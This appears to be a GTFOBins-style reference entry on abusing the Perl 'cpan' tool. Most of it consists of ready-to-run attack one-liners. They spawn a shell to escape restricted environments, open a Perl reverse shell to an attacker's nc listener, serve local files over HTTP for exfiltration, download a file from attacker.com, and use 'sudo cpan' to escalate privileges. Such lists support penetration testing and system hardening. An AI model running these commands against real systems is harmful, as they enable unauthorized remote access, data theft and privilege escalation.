It can be used to break out from restricted environments by spawning an interactive system shell.
cpan
lets you execute perl commands with the ! command
.
cpan
! exec '/bin/bash'
It can send back a reverse shell to a listening attacker to open a remote network access.
Run nc -lvp RPORT
on the attacker box to receive the shell.
export RHOST=localhost
export RPORT=9000
cpan
! use Socket; my $i="$ENV{RHOST}"; my $p=$ENV{RPORT}; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
It can exfiltrate files on the network.
Serve files in the local folder running an HTTP server on port 8080. Install the dependency via cpan HTTP::Server::Simple
.
cpan
! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
It can download remote files.
Fetch a remote file via an HTTP GET request and store it in PWD
.
export URL=http://attacker.com/file_to_get
cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
If the binary is allowed to run as superuser by sudo
, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo cpan
! exec '/bin/bash'